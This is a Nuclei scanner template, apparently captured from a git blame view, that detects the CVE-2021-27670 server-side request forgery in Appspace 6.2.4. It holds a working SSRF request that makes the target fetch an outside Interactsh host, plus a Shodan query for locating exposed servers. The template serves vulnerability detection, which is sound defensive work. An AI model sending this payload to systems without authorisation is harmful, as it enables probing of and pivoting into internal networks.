2023-07-25 09:07:18 +00:00
|
|
|
id: CVE-2021-27670
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Appspace 6.2.4 - Server-Side Request Forgery
|
|
|
|
author: ritikchaddha
|
2023-08-31 11:46:18 +00:00
|
|
|
severity: critical
|
2023-07-25 09:07:18 +00:00
|
|
|
description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.
|
|
|
|
reference:
|
|
|
|
- https://github.com/h3110mb/PoCSSrfApp
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27670
|
|
|
|
classification:
|
2023-08-31 11:46:18 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
2023-07-25 09:07:18 +00:00
|
|
|
cve-id: CVE-2021-27670
|
2023-08-31 11:46:18 +00:00
|
|
|
cwe-id: CWE-918
|
|
|
|
epss-score: 0.32169
|
|
|
|
cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*
|
|
|
|
epss-percentile: 0.96438
|
2023-07-25 09:07:18 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
|
|
|
verified: true
|
|
|
|
shodan-query: title:"Appspace"
|
2023-08-31 11:46:18 +00:00
|
|
|
vendor: appspace
|
|
|
|
product: appspace
|
2023-07-25 09:07:18 +00:00
|
|
|
tags: cve,cve2023,appspace,ssrf
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "<h1> Interactsh Server </h1>"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|